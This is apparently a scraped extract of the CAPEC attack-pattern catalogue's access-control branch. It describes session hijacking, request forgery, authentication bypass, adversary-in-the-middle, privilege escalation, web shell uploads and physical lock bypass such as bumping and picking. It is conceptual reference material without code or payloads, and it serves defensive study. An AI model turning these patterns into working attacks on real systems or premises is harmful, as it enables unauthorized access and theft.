An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 196 (Session Credential Falsification through Forging) > 59 (Session Credential Falsification through Prediction)

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 510 (SaaS User Request Forgery)

An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, "piggy-backing" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 593 (Session Hijacking)

This type of attack involves an adversary that exploits weaknesses in an application's use of sessions in performing authentication. The adversary is able to steal or manipulate an active session and use it to gain unathorized access to the application.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 593 (Session Hijacking) > 102 (Session Sidejacking)

Session sidejacking takes advantage of an unencrypted communication channel between a victim and target system. The attacker sniffs traffic on a network looking for session tokens in unencrypted traffic. Once a session token is captured, the attacker performs malicious actions by using the stolen token with the targeted application to impersonate the victim. This attack is a specific method of session hijacking, which is exploiting a valid session token to gain unauthorized access to a target system or information. Other methods to perform a session hijacking are session fixation, cross-site scripting, or compromising a user or server machine and stealing the session token.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 593 (Session Hijacking) > 107 (Cross Site Tracing)

Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to a destination system's web server.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 593 (Session Hijacking) > 60 (Reusing Session IDs (aka Session Replay))

This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 593 (Session Hijacking) > 61 (Session Fixation)

The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 62 (Cross Site Request Forgery)

An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply "riding" the existing session cookie.Session Riding

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 21 (Exploitation of Trusted Identifiers) > 62 (Cross Site Request Forgery) > 467 (Cross Site Identification)

An attacker harvests identifying information about a victim via an active session that the victim's browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the "remember me" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim's browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing).

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 114 (Authentication Abuse)

An attacker obtains unauthorized access to an application, service or device either through knowledge of the inherent weaknesses of an authentication mechanism, or by exploiting a flaw in the authentication scheme's implementation. In such an attack an authentication mechanism is functioning but a carefully controlled sequence of events causes the mechanism to grant access to the attacker.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 114 (Authentication Abuse) > 90 (Reflection Attack in Authentication Protocol)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass)

An attacker gains access to application, service, or device with the privileges of an authorized or privileged user by evading or circumventing an authentication mechanism. The attacker is therefore able to access protected data without authentication ever having taken place.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 461 (Web Services API Signature Forgery Leveraging Hash Function Extension Weakness)

An adversary utilizes a hash function extension/padding weakness, to modify the parameters passed to the web service requesting authentication by generating their own call in order to generate a legitimate signature hash (as described in the notes), without knowledge of the secret token sometimes provided by the web service.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 480 (Escaping Virtualization)

An adversary gains access to an application, service, or device with the privileges of an authorized or privileged user by escaping the confines of a virtualized environment. The adversary is then able to access resources or execute unauthorized code within the host environment, generally with the privileges of the user running the virtualized process. Successfully executing an attack of this type is often the first step in executing more complex attacks.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 480 (Escaping Virtualization) > 237 (Escaping a Sandbox by Calling Code in Another Language)

The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 664 (Server Side Request Forgery)

An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 668 (Key Negotiation of Bluetooth Attack (KNOB))

An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 115 (Authentication Bypass) > 87 (Forceful Browsing)

An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client)

An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 202 (Create Malicious Client)

An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 207 (Removing Important Client Functionality)

An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 207 (Removing Important Client Functionality) > 200 (Removal of filters: Input filters, output filters, data masking)

An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). Input filters might also be designed to constrained executable content.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 207 (Removing Important Client Functionality) > 208 (Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements)

An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 39 (Manipulating Opaque Client-based Data Tokens)

In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 39 (Manipulating Opaque Client-based Data Tokens) > 31 (Accessing/Intercepting/Modifying HTTP Cookies)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 77 (Manipulating User-Controlled Variables)

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 77 (Manipulating User-Controlled Variables) > 13 (Subverting Environment Variable Values)

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 22 (Exploiting Trust in Client) > 77 (Manipulating User-Controlled Variables) > 162 (Manipulating Hidden Fields)

An adversary exploits a weakness in the server's trust of client-side processing by modifying data on the client-side, such as price information, and then submitting this data to the server, which processes the modified data. For example, eShoplifting is a data manipulation attack against an on-line merchant during a purchasing transaction. The manipulation of price, discount or quantity fields in the transaction message allows the adversary to acquire items at a lower cost than the merchant intended. The adversary performs a normal purchasing transaction but edits hidden fields within the HTML form response that store price or other information to give themselves a better deal. The merchant then uses the modified pricing information in calculating the cost of the selected items.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM))

An adversary targets the communication between two components (typically client and server), in order to alter or obtain data from transactions. A general approach entails the adversary placing themself within the communication channel between the two components. Man-in-the-Middle / MITMPerson-in-the-Middle / PiTMMonkey-in-the-MiddleMonster-in-the-MiddleOn-path Attacker

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 219 (XML Routing Detour Attacks)

An attacker subverts an intermediate system used to process XML content and forces the intermediate to modify and/or re-route the processing of the content. XML Routing Detour Attacks are Adversary in the Middle type attacks (CAPEC-94). The attacker compromises or inserts an intermediate system in the processing of the XML message. For example, WS-Routing can be used to specify a series of nodes or intermediaries through which content is passed. If any of the intermediate nodes in this route are compromised by an attacker they could be used for a routing detour attack. From the compromised system the attacker is able to route the XML process to other nodes of their choice and modify the responses so that the normal chain of processing is unaware of the interception. This system can forward the message to an outside entity and hide the forwarding and processing from the legitimate processing systems by altering the header information.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 384 (Application API Message Manipulation via Man-in-the-Middle)

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Adversary-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 384 (Application API Message Manipulation via Man-in-the-Middle) > 385 (Transaction or Event Tampering via Application API Manipulation)

An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 384 (Application API Message Manipulation via Man-in-the-Middle) > 389 (Content Spoofing Via Application API Manipulation)

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 386 (Application API Navigation Remapping)

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 386 (Application API Navigation Remapping) > 387 (Navigation Remapping To Propagate Malicious Content)

An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 386 (Application API Navigation Remapping) > 388 (Application API Button Hijacking)

An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 466 (Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy)

An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim's browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim's browser and some non-sensitive website that does not use TLS.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 662 (Adversary in the Browser (AiTB))

An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints. Man in the BrowserBoy in the BrowserMan in the Mobile

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 94 (Adversary in the Middle (AiTM)) > 701 (Browser in the Middle (BiTM))

An adversary exploits the inherent functionalities of a web browser, in order to establish an unnoticed remote desktop connection in the victim's browser to the adversary's system. The adversary must deploy a web client with a remote desktop session that the victim can access.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse)

An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 1 (Accessing Functionality Not Properly Constrained by ACLs)

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 1 (Accessing Functionality Not Properly Constrained by ACLs) > 58 (Restful Privilege Elevation)

An adversary identifies a Rest HTTP (Get, Put, Delete) style permission method allowing them to perform various malicious actions upon server data due to lack of access control mechanisms implemented within the application service accepting HTTP messages.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 1 (Accessing Functionality Not Properly Constrained by ACLs) > 679 (Exploitation of Improperly Configured or Implemented Memory Protections)

An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 1 (Accessing Functionality Not Properly Constrained by ACLs) > 680 (Exploitation of Improperly Controlled Registers)

An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 1 (Accessing Functionality Not Properly Constrained by ACLs) > 681 (Exploitation of Improperly Controlled Hardware Security Identifiers)

An adversary takes advantage of missing or incorrectly configured security identifiers (e.g., tokens), which are used for access control within a System-on-Chip (SoC), to read/write data or execute a given action.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files)

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 177 (Create files with the same name as files protected with a higher classification)

An attacker exploits file location algorithms in an operating system or application by creating a file with the same name as a protected or privileged file. The attacker could manipulate the system if the attacker-created file is trusted by the operating system or an application component that attempts to load the original file. Applications often load or include external files, such as libraries or configuration files. These files should be protected against malicious manipulation. However, if the application only uses the name of the file when locating it, an attacker may be able to create a file with the same name and place it in a directory that the application will search before the directory with the legitimate file is searched. Because the attackers' file is discovered first, it would be used by the target application. This attack can be extremely destructive if the referenced file is executable and/or is granted special privileges based solely on having a particular name.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 263 (Force Use of Corrupted Files)

This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 562 (Modify Shared File)

An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. Once a user opens the shared content, the tainted content is executed.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 563 (Add Malicious File to Shared Webroot)

An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 642 (Replace Binaries)

Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 17 (Using Malicious Files) > 650 (Upload a Web Shell to a Web Server)

By exploiting insufficient permissions, it is possible to upload a web shell to a web server in such a way that it can be executed remotely. This shell can have various capabilities, thereby acting as a "gateway" to the underlying web server. The shell might execute at the higher permission level of the web server, providing the ability the execute malicious code at elevated levels.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels)

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels) > 58 (Restful Privilege Elevation)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels) > 679 (Exploitation of Improperly Configured or Implemented Memory Protections)

An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels) > 680 (Exploitation of Improperly Controlled Registers)

An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels) > 681 (Exploitation of Improperly Controlled Hardware Security Identifiers)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 180 (Exploiting Incorrectly Configured Access Control Security Levels) > 702 (Exploiting Incorrect Chaining or Granularity of Hardware Debug Components)

An adversary exploits incorrect chaining or granularity of hardware debug components in order to gain unauthorized access to debug functionality on a chip. This happens when authorization is not checked on a per function basis and is assumed for a chain or group of debug functionality.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 201 (Serialized Data External Linking)

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 122 (Privilege Abuse) > 503 (WebView Exposure)

An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation)

An adversary exploits a weakness enabling them to elevate their privilege and perform an action that they are not supposed to be authorized to perform.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation) > 104 (Cross Zone Scripting)

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation) > 234 (Hijacking a privileged process)

An adversary gains control of a process that is assigned elevated privileges in order to execute arbitrary code with those privileges. Some processes are assigned elevated privileges on an operating system, usually through association with a particular user, group, or role. If an attacker can hijack this process, they will be able to assume its level of privilege in order to execute their own code.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation) > 30 (Hijacking a Privileged Thread of Execution)

An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process's memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation) > 68 (Subvert Code-signing Facilities)

Many languages use code signing facilities to vouch for code's identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 233 (Privilege Escalation) > 69 (Target Programs with Elevated Privileges)

This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security)

Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 391 (Bypassing Physical Locks)

An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 391 (Bypassing Physical Locks) > 392 (Lock Bumping)

An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 391 (Bypassing Physical Locks) > 393 (Lock Picking)

An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 391 (Bypassing Physical Locks) > 394 (Using a Snap Gun Lock to Force a Lock)

An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls)

An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.

1000 (Mechanisms of Attack) > 225 (Subvert Access Control) > 390 (Bypassing Physical Security) > 395 (Bypassing Electronic Locks and Access Controls) > 397 (Cloning Magnetic Strip Cards)

